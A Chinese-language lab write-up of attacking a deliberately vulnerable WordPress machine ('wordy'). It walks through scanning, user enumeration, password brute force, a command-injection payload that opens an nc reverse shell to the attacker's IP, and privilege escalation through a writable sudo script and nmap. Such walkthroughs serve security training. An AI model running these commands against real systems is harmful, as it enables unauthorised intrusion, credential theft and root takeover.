靶机地址
一.进行信息收集
1.使用nmap扫描,进行主机发现
nmap -sn 192.168.25.0/24
使用nmap扫描之后发现ip地址为:192.168.25.150
2.使用nmap进行端口扫描
nmap -p 1-65535 -T4 -A -v 192.168.25.150
发现其开启了22,80端口
3.开启了80端口,用浏览器访问一下,还是和DC-2一样的,需要在hosts文件中添加一条数据
192.168.25.150 wordy
4.使用小工具收集web指纹信息
这里可以发现其CMS为wordpress,数据库为mysql
5. 扫描敏感目录
dirsearch -u "http://192.168.25.150/"
1. 扫描到了后台登录页面
2.成功进入后台登录界面
6 .由于是wordpress的站,用专用扫描器wpscan看看有哪些用户
wpscan --url http://wordy/ -e u
发现5个用户
7.使用cewl拉取一个字典进行爆破,没有爆破成功,应该是密码字典不合适
cewl http://wordy/ -m 5 -d 1 -w wp.txt
8.根据官方提示,需要我们自己生成一个密码字典
就是将kali中rockyou.txt这个字典中选择筛选出包含k01的密码,也可以直接使用 rockyou.txt这个字典,但是里面有七千多万调数据,很慢,筛选后有一万多条数据.
9.密码爆破
1.这里可以使用wpscan进行爆破,也可以使用burpsuite进行爆破,DC-2中我是用的是burpsuite,这里我使用wpscan进行爆破
wpscan --url http://wordy/ -U 1.txt -P passwords.txt
1.txt里面是之前扫到的几个用户名,passwords.txt 是做好的密码字典
2.成功爆破出mark的账号和密码
3.登录后,到处看看有没有什么可以利用的
二.获取shell
1.在页面这里发现一个能够解析ip的插件
2.根据之前dvwa中命令注入的经验,用命令注入试试
1. 吼吼吼,发现这里有命令注入漏洞
2.发现这里长度有限制,去burpsuite抓包
3.在kali中侦听4444端口
nc -lvp 4444
4.burpsuite抓包,发送到repeater模块,修改参数,kali中成功连接
127.0.0.1|nc 172.23.11.188 4444 -e /bin/bash
5.成功获取到shell
6.利用python的pty模块获取一个更好看的shell
python -c "import pty;pty.spawn('/bin/sh')";
三.权限提升
1.看看登录的mark用户下有什么东西
2.打开后,发现是graham用户的密码
3.使用ssh工具链接一下,成功连接
4.看一下有root权限的文件
find / -user root -perm -4000 -print 2>/dev/null
5.用sudo -l看一下,发现在jens用户下,有一个可以无密码执行的脚本
6. 尝试切换到jens用户
1.在文件中添加命令行
echo '/bin/bash' >> backups.sh
2.切换到jens用户下
sudo -u jens ./backups.sh
7.用sudo -l看一下,jens用户下那里可以提权
1.发现了nmap
2.这里的方法可以都试一下
成功拿到root权限